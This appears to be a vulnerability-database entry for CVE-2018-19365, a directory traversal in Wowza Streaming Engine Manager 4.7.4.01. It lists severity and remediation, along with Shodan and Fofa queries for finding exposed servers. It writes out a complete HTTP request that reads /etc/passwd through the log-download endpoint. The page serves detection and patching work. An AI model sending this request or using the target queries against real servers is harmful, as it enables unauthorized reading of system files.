🔙 목록으로 돌아가기

CVE-2018-19365: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal

TitleWowza Streaming Engine Manager 4.7.4.01 - Directory Traversal
Author0x_Akoko
SeverityCritical
ImpactAn attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information.
RemediationUpgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability.
CVSS Score9.1
EPSS Score0.8708
CVE IDCVE-2018-19365
CWE IDCWE-22
Shodan Queryhttp.title:"manager" product:"wowza streaming engine"cpe:"cpe:2.3:a:wowza:streaming_engine"
Fofa Querytitle="manager" product:"wowza streaming engine"
Tags cve2018 cve wowza lfi vkev vuln

🔍 Vulnerability Description

Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.

🌐 HTTP Request

GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/15.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-19365.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-19365.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A